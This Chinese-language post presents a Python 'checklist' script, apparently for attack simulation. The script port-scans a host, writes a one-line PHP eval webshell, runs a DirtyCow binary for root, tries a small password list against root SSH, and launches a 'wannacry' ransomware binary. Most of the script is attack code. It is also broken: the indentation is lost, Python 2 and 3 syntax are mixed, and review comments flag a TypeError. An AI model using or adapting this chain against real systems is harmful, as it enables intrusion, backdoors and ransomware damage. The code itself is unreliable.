前言:
n久之前为测试写的脚本，已经更新了几个版本。把最简单的版本放出来。
测试要求尽量少用第三方库。
# coding:utf-8
import socket
import sys
import os
import paramiko
# 扫描渗透溯源的端口
def scan_port(host):
    """Attempt a TCP connect to a fixed list of ports on *host* and print the open ones.

    host: hostname or IP address; resolved once with socket.gethostbyname.
    Side effects: prints one line per port probed, plus a line for each
    port whose connect succeeded. Returns None.
    """
    # Probe list is hard-coded in this version rather than passed in.
    ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389]
    target_ip = socket.gethostbyname(host)
    for port in ports:
        # Python 2 print statement; the rest of this file uses print(...).
        print "port scanning is %s " % port
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)
        # connect_ex returns an errno (0 on success) instead of raising.
        result = sock.connect_ex((target_ip, port))
        # NOTE(review): sock is never closed, so every probe leaks a descriptor.
        if result == 0:
            # NOTE(review): port is an int; str + int raises TypeError on this line.
            print("open_port:" + port)
# 执行命令
def exec_system():
print(os.system('whoami'))
print(os.system('name -a'))
print(os.system('cat /proc/version'))
# 使用dirtycow提权
def get_root(path):
path = path + '/dirtycow'
os.system("chmod +x {}".format(path))
os.system("./{}".format(path))
# 生成脚本木马
def echo_webshell(path):
path = path + '/webshell.php'
with open(path, 'w') as f:
f.writelines("<?php @eval($_POST['cmd']);?>")
# 远程连接ssh
def ssh_connect(host):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
password = ['toor', 'admin123']
for pwd in password:
try:
ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5)
ssh.close()
print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
except paramiko.AuthenticationException, e:
pass
except socket.error, e:
pass
# 执行wannacry勒索脚本
def exec_wannacry(path):
path = path + '/wannacry'
os.system("chmod +x {}".format(path))
os.system("./{}".format(path))
if __name__ == '__main__':
if len(sys.argv) < 2:
print('argument error')
print('example:python checklist.py -h 127.0.0.1 -p /tmp/')
exit(0)
host = sys.argv[2]
path = sys.argv[4]
scan_port(host)
echo_webshell(path)
get_root(path)
ssh_connect(host)
exec_wannacry(path)